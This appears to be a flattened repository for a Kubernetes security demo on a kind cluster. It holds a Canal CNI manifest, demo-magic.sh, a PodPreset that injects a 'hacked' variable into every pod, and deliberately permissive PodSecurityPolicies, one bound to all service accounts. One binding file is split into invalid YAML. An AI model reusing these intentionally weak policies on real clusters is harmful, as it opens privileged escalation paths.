apiGroup: rbac.authorization.k8s.io 330 | kind: ClusterRole 331 | name: flannel 332 | subjects: 333 | - kind: ServiceAccount 334 | name: canal 335 | namespace: kube-system 336 | --- 337 | apiVersion: rbac.authorization.k8s.io/v1 338 | kind: ClusterRoleBinding 339 | metadata: 340 | name: canal-calico 341 | roleRef: 342 | apiGroup: rbac.authorization.k8s.io 343 | kind: ClusterRole 344 | name: calico-node 345 | subjects: 346 | - kind: ServiceAccount 347 | name: canal 348 | namespace: kube-system 349 | 350 | --- 351 | # Source: calico/templates/calico-node.yaml 352 | # This manifest installs the canal container, as well 353 | # as the CNI plugins and network config on 354 | # each master and worker node in a Kubernetes cluster. 
---
# canal DaemonSet: runs calico (policy) + flannel (overlay) on every node.
kind: DaemonSet
apiVersion: apps/v1
metadata:
  name: canal
  namespace: kube-system
  labels:
    k8s-app: canal
spec:
  selector:
    matchLabels:
      k8s-app: canal
  updateStrategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 1
  template:
    metadata:
      labels:
        k8s-app: canal
      annotations:
        # This, along with the CriticalAddonsOnly toleration below, marks the
        # pod as a critical add-on, ensuring it gets priority scheduling and
        # that its resources are reserved if it ever gets evicted.
        # NOTE(review): this annotation is deprecated; priorityClassName below
        # already conveys the same guarantee on current Kubernetes.
        scheduler.alpha.kubernetes.io/critical-pod: ''
    spec:
      nodeSelector:
        beta.kubernetes.io/os: linux
      hostNetwork: true
      tolerations:
        # Make sure canal gets scheduled on all nodes.
        - effect: NoSchedule
          operator: Exists
        # Mark the pod as a critical add-on for rescheduling.
        - key: CriticalAddonsOnly
          operator: Exists
        - effect: NoExecute
          operator: Exists
      serviceAccountName: canal
      # Minimize downtime during a rolling upgrade or deletion; tell Kubernetes
      # to do a "force deletion":
      # https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods
      terminationGracePeriodSeconds: 0
      priorityClassName: system-node-critical
      initContainers:
        # Installs the CNI binaries and CNI network config file on each node.
        - name: install-cni
          image: calico/cni:v3.8.1
          command: ["/install-cni.sh"]
          env:
            # Name of the CNI config file to create.
            - name: CNI_CONF_NAME
              value: "10-canal.conflist"
            # The CNI network config to install on each node.
            - name: CNI_NETWORK_CONFIG
              valueFrom:
                configMapKeyRef:
                  name: canal-config
                  key: cni_network_config
            # Set the hostname based on the k8s node name.
            - name: KUBERNETES_NODE_NAME
              valueFrom:
                fieldRef:
                  fieldPath: spec.nodeName
            # Prevents the container from sleeping forever.
            - name: SLEEP
              value: "false"
          volumeMounts:
            - mountPath: /host/opt/cni/bin
              name: cni-bin-dir
            - mountPath: /host/etc/cni/net.d
              name: cni-net-dir
        # Adds a Flex Volume Driver that creates a per-pod Unix Domain Socket
        # to allow Dikastes to communicate with Felix over the Policy Sync API.
        - name: flexvol-driver
          image: calico/pod2daemon-flexvol:v3.8.1
          volumeMounts:
            - name: flexvol-driver-host
              mountPath: /host/driver
      containers:
        # Runs the canal container on each Kubernetes node. This container
        # programs network policy and routes on each host.
        - name: calico-node
          image: calico/node:v3.8.1
          env:
            # Use the Kubernetes API as the backing datastore.
            - name: DATASTORE_TYPE
              value: "kubernetes"
            # Configure route aggregation based on pod CIDR.
            - name: USE_POD_CIDR
              value: "true"
            # Wait for the datastore.
            - name: WAIT_FOR_DATASTORE
              value: "true"
            # Set based on the k8s node name.
            - name: NODENAME
              valueFrom:
                fieldRef:
                  fieldPath: spec.nodeName
            # Don't enable BGP; flannel provides pod networking here.
            - name: CALICO_NETWORKING_BACKEND
              value: "none"
            # Cluster type to identify the deployment type.
            - name: CLUSTER_TYPE
              value: "k8s,canal"
            # Period, in seconds, at which felix re-applies all iptables state.
            - name: FELIX_IPTABLESREFRESHINTERVAL
              value: "60"
            # No IP address needed.
            - name: IP
              value: ""
            # The default IPv4 pool to create on startup if none exists.
            # NOTE(review): differs from the kind podSubnet (10.244.0.0/16);
            # presumably harmless because USE_POD_CIDR=true hands pod
            # addressing to flannel — confirm before enabling BGP.
            - name: CALICO_IPV4POOL_CIDR
              value: "192.168.0.0/16"
            # Disable file logging so `kubectl logs` works.
            - name: CALICO_DISABLE_FILE_LOGGING
              value: "true"
            # Set Felix endpoint to host default action to ACCEPT.
            - name: FELIX_DEFAULTENDPOINTTOHOSTACTION
              value: "ACCEPT"
            # Disable IPv6 on Kubernetes.
            - name: FELIX_IPV6SUPPORT
              value: "false"
            # Set Felix logging to "info".
            - name: FELIX_LOGSEVERITYSCREEN
              value: "info"
            - name: FELIX_HEALTHENABLED
              value: "true"
          securityContext:
            privileged: true
          resources:
            requests:
              cpu: 250m
          livenessProbe:
            httpGet:
              path: /liveness
              port: 9099
              host: localhost
            periodSeconds: 10
            initialDelaySeconds: 10
            failureThreshold: 6
          readinessProbe:
            httpGet:
              path: /readiness
              port: 9099
              host: localhost
            periodSeconds: 10
          volumeMounts:
            - mountPath: /lib/modules
              name: lib-modules
              readOnly: true
            - mountPath: /run/xtables.lock
              name: xtables-lock
              readOnly: false
            - mountPath: /var/run/calico
              name: var-run-calico
              readOnly: false
            - mountPath: /var/lib/calico
              name: var-lib-calico
              readOnly: false
            - name: policysync
              mountPath: /var/run/nodeagent
        # Runs flannel using the kube-subnet-mgr backend for allocating subnets.
        - name: kube-flannel
          image: quay.io/coreos/flannel:v0.11.0
          command: ["/opt/bin/flanneld", "--ip-masq", "--kube-subnet-mgr"]
          securityContext:
            privileged: true
          env:
            - name: POD_NAME
              valueFrom:
                fieldRef:
                  fieldPath: metadata.name
            - name: POD_NAMESPACE
              valueFrom:
                fieldRef:
                  fieldPath: metadata.namespace
            - name: FLANNELD_IFACE
              valueFrom:
                configMapKeyRef:
                  name: canal-config
                  key: canal_iface
            - name: FLANNELD_IP_MASQ
              valueFrom:
                configMapKeyRef:
                  name: canal-config
                  key: masquerade
          volumeMounts:
            - mountPath: /run/xtables.lock
              name: xtables-lock
              readOnly: false
            - name: flannel-cfg
              mountPath: /etc/kube-flannel/
      volumes:
        # Used by canal.
        - name: lib-modules
          hostPath:
            path: /lib/modules
        - name: var-run-calico
          hostPath:
            path: /var/run/calico
        - name: var-lib-calico
          hostPath:
            path: /var/lib/calico
        - name: xtables-lock
          hostPath:
            path: /run/xtables.lock
            type: FileOrCreate
        # Used by flannel.
        - name: flannel-cfg
          configMap:
            name: canal-config
        # Used to install CNI.
        - name: cni-bin-dir
          hostPath:
            path: /opt/cni/bin
        - name: cni-net-dir
          hostPath:
            path: /etc/cni/net.d
        # Used to create per-pod Unix Domain Sockets.
        - name: policysync
          hostPath:
            type: DirectoryOrCreate
            path: /var/run/nodeagent
        # Used to install the Flex Volume Driver.
        - name: flexvol-driver-host
          hostPath:
            type: DirectoryOrCreate
            path: /usr/libexec/kubernetes/kubelet-plugins/volume/exec/nodeagent~uds
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: canal
  namespace: kube-system

---
# Source: calico/templates/calico-etcd-secrets.yaml

---
# Source: calico/templates/calico-kube-controllers.yaml

---
# Source: calico/templates/calico-typha.yaml

---
# Source: calico/templates/configure-canal.yaml

-------------------------------------------------------------------------------- /kind/config: --------------------------------------------------------------------------------
kind: Cluster
apiVersion: kind.sigs.k8s.io/v1alpha3
networking:
  # CNI is installed by hand (kind/canal.yaml) so the demos get NetworkPolicy.
  disableDefaultCNI: True
nodes:
- role: control-plane
- role: worker
- role: worker
kubeadmConfigPatches:
- |
  apiVersion: kubeadm.k8s.io/v1beta2
  kind: ClusterConfiguration
  metadata:
    name: config
  apiServer:
    extraArgs:
      # PodSecurityPolicy + PodPreset admission, with the alpha settings API
      # enabled so PodPreset objects can be created.
      "enable-admission-plugins": "PodSecurityPolicy,PodPreset"
      "runtime-config": "settings.k8s.io/v1alpha1=true"
  networking:
    # FIX: was "10.96.0.1/12" — a host address, not a network address.
    # kubeadm expects the subnet's network address (default 10.96.0.0/12).
    serviceSubnet: "10.96.0.0/12"
    podSubnet: "10.244.0.0/16"
-------------------------------------------------------------------------------- /kind/fix_sysctls.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Relax reverse-path filtering inside every kind node container so calico's
# cross-node pod traffic is not dropped (same command setup.sh runs).
kind get nodes | xargs -n1 -I {} docker exec {} sysctl -w net.ipv4.conf.all.rp_filter=0
-------------------------------------------------------------------------------- /lib/demo-magic.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash

###############################################################################
#
# demo-magic.sh
#
# Copyright (c) 2015 Paxton Hare
#
# This script lets you script demos in bash. It runs through your demo script
# when you press ENTER. It simulates typing and runs commands.
#
###############################################################################

# the speed to "type" the text
TYPE_SPEED=20

# no wait after "p" or "pe"
NO_WAIT=false

# if > 0, will pause for this amount of seconds before automatically proceeding with any p or pe
PROMPT_TIMEOUT=0

# don't show command number unless user specifies it
SHOW_CMD_NUMS=false


# handy color vars for pretty prompts
BLACK="\033[0;30m"
BLUE="\033[0;34m"
GREEN="\033[0;32m"
GREY="\033[0;90m"
CYAN="\033[0;36m"
RED="\033[0;31m"
PURPLE="\033[0;35m"
BROWN="\033[0;33m"
WHITE="\033[1;37m"
COLOR_RESET="\033[0m"

C_NUM=0

# prompt and command color which can be overriden
DEMO_PROMPT="$ "
DEMO_CMD_COLOR=$WHITE
DEMO_COMMENT_COLOR=$GREY

##
# prints the script usage
##
function usage() {
  echo -e ""
  echo -e "Usage: $0 [options]"
  echo -e ""
  echo -e "\tWhere options is one or more of:"
  echo -e "\t-h\tPrints Help text"
  echo -e "\t-d\tDebug mode. Disables simulated typing"
  echo -e "\t-n\tNo wait"
  echo -e "\t-w\tWaits max the given amount of seconds before proceeding with demo (e.g. '-w5')"
  echo -e ""
}

##
# wait for user to press ENTER
# if $PROMPT_TIMEOUT > 0 this will be used as the max time for proceeding automatically
##
function wait() {
  if [[ "$PROMPT_TIMEOUT" == "0" ]]; then
    read -rs
  else
    read -rst "$PROMPT_TIMEOUT"
  fi
}

##
# print command only. Useful for when you want to pretend to run a command
#
# takes 1 param - the string command to print
#
# usage: p "ls -l"
#
##
function p() {
  if [[ ${1:0:1} == "#" ]]; then
    cmd=$DEMO_COMMENT_COLOR$1$COLOR_RESET
  else
    cmd=$DEMO_CMD_COLOR$1$COLOR_RESET
  fi

  # render the prompt
  # FIX: the `</dev/null 2>` redirection had been stripped (eaten as an HTML
  # tag during extraction); without it bash starts a real interactive shell
  # and the pipeline hangs waiting for input.
  x=$(PS1="$DEMO_PROMPT" "$BASH" --norc -i </dev/null 2>&1 | sed -n '${s/^\(.*\)exit$/\1/p;}')

  # show command number is selected
  if $SHOW_CMD_NUMS; then
    printf "[$((++C_NUM))] $x"
  else
    printf "$x"
  fi

  # wait for the user to press a key before typing the command
  if !($NO_WAIT); then
    wait
  fi

  if [[ -z $TYPE_SPEED ]]; then
    echo -en "$cmd"
  else
    # simulate typing at roughly TYPE_SPEED chars/sec with random jitter
    # (modernized from the deprecated $[...] arithmetic form)
    echo -en "$cmd" | pv -qL $((TYPE_SPEED + (-2 + RANDOM % 5)))
  fi

  # wait for the user to press a key before moving on
  if !($NO_WAIT); then
    wait
  fi
  echo ""
}

##
# Prints and executes a command
#
# takes 1 parameter - the string command to run
#
# usage: pe "ls -l"
#
##
function pe() {
  # print the command
  p "$@"

  # execute the command
  eval "$@"
}

##
# Enters script into interactive mode
#
# and allows newly typed commands to be executed within the script
#
# usage : cmd
#
##
function cmd() {
  # render the prompt
  # FIX: restore the stripped `</dev/null 2>` redirection (same as p() above)
  x=$(PS1="$DEMO_PROMPT" "$BASH" --norc -i </dev/null 2>&1 | sed -n '${s/^\(.*\)exit$/\1/p;}')
  printf "$x\033[0m"
  # -r keeps backslashes literal in the typed command
  read -r command
  eval "${command}"
}


# Aborts with install instructions unless `pv` (used to simulate typing)
# is available on the PATH.
function check_pv() {
  command -v pv >/dev/null 2>&1 || {

    echo ""
    echo -e "${RED}##############################################################"
    echo "# HOLD IT!! I require pv but it's not installed. Aborting." >&2;
    echo -e "${RED}##############################################################"
    echo ""
    echo -e "${COLOR_RESET}Installing pv:"
    echo ""
    echo -e "${BLUE}Mac:${COLOR_RESET} $ brew install pv"
    echo ""
    echo -e "${BLUE}Other:${COLOR_RESET} http://www.ivarch.com/programs/pv.shtml"
    echo -e "${COLOR_RESET}"
    exit 1;
  }
}

check_pv
#
# handle some default params
# -h for help
# -d for disabling simulated typing
#
while getopts ":dhncw:" opt; do
  case $opt in
    h)
      usage
      exit 1
      ;;
    d)
      unset TYPE_SPEED
      ;;
    n)
      NO_WAIT=true
      ;;
    c)
      SHOW_CMD_NUMS=true
      ;;
    w)
      PROMPT_TIMEOUT=$OPTARG
      ;;
  esac
done
-------------------------------------------------------------------------------- /podpresets/preset.yaml: --------------------------------------------------------------------------------
apiVersion: settings.k8s.io/v1alpha1
kind: PodPreset
metadata:
  name: example
spec:
  # Matches every pod that does NOT carry a "disable" label — i.e. the preset
  # is injected by default, which is the point of the demo.
  selector:
    matchExpressions:
    - key: disable
      operator: DoesNotExist
  env:
  - name: hacked
    value: "true"
  volumeMounts:
  - mountPath: /certsmaybe
    name: certs-volume
  volumes:
  - name: certs-volume
    emptyDir: {}
-------------------------------------------------------------------------------- /psp/allow-all-clusterrolebinding.yaml: --------------------------------------------------------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: allow-all-kube-system
roleRef:
  apiGroup:
rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp-permissive
subjects:
# NOTE(review): "namespace" has no effect on Group subjects, so as written
# this binds the permissive PSP role to service accounts cluster-wide; to
# scope it to kube-system the group would be
# "system:serviceaccounts:kube-system". Kept as-is — confirm intended scope.
- kind: Group
  name: system:serviceaccounts
  namespace: kube-system
-------------------------------------------------------------------------------- /psp/allow-kubeadm-clusterrolebinding.yaml: --------------------------------------------------------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubeadm-kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp-permissive
subjects:
# Control-plane components and node identities that must keep scheduling
# privileged pods once PodSecurityPolicy admission is enforced.
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: system:node:kind-control-plane
- kind: ServiceAccount
  name: flannel
  namespace: kube-system
- kind: ServiceAccount
  name: coredns
  namespace: kube-system
- kind: ServiceAccount
  name: kube-proxy
  namespace: kube-system
- kind: Group
  apiGroup: rbac.authorization.k8s.io
  name: system:nodes
- kind: User
  apiGroup: rbac.authorization.k8s.io
  name: kubelet
-------------------------------------------------------------------------------- /psp/allow-restricted-clusterrolebinding.yaml: --------------------------------------------------------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: allow-restricted-kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp-restrictive
subjects:
# NOTE(review): "namespace" is ignored for Group subjects (see
# allow-all-clusterrolebinding.yaml) — effective scope is all service accounts.
- kind: Group
  name: system:serviceaccounts
  namespace: kube-system
-------------------------------------------------------------------------------- /psp/permissive-psp.yaml: --------------------------------------------------------------------------------
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: permissive
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  # FIX: the original declared hostNetwork, hostPorts and volumes twice
  # (duplicate mapping keys are rejected by strict YAML parsers). Each key
  # now appears exactly once, with the effective (last-key-wins) value.
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
-------------------------------------------------------------------------------- /psp/psp-permissive-clusterrole.yaml: --------------------------------------------------------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp-permissive
rules:
# Grants the "use" verb on the permissive PSP; binding this role is what
# lets a subject create pods validated against it.
- apiGroups:
  - extensions
  resourceNames:
  - permissive
  resources:
  - podsecuritypolicies
  verbs:
  - use
-------------------------------------------------------------------------------- /psp/psp-restrictive-clusterrole.yaml: --------------------------------------------------------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp-restrictive
rules:
- apiGroups:
  - extensions
  resourceNames:
  - restrictive
  resources:
  - podsecuritypolicies
  verbs:
  - use
-------------------------------------------------------------------------------- /psp/restrictive-psp.yaml: --------------------------------------------------------------------------------
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restrictive
spec:
  privileged: false
  hostNetwork: false
  allowPrivilegeEscalation: false
  defaultAllowPrivilegeEscalation: false
  hostPID: false
  hostIPC: false
  runAsUser:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - 'configMap'
  - 'downwardAPI'
  - 'emptyDir'
  - 'persistentVolumeClaim'
  - 'secret'
  - 'projected'
  # NOTE(review): allowing every capability contradicts a "restrictive"
  # policy — a hardened version would drop this or use
  # requiredDropCapabilities. Kept as-is because the demo may rely on it.
  allowedCapabilities:
  - '*'
-------------------------------------------------------------------------------- /setup.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Pull every image the demos need, rebuild the kind cluster, side-load the
# images, relax rp_filter for calico, then install the CNI and PSP objects.

echo "cache all the images for our cluster"
xargs -P0 -n1 -I {} docker pull {} < images/images

echo "delete old cluster"
kind delete cluster

echo "create the cluster"
kind create cluster --config kind/config

echo "push the images into the kind cluster this takes about 5 minutes"
time xargs -P2 -n1 -I {} kind load docker-image {} < images/images

echo "fix the sysctls for calico"
kind get nodes | xargs -n1 -I {} docker exec {} sysctl -w net.ipv4.conf.all.rp_filter=0


echo "apply cni manifests"
kubectl apply -f kind/canal.yaml

echo "apply Pod Security Policies"
kubectl apply -f psp/

echo "done it's demo time!"
--------------------------------------------------------------------------------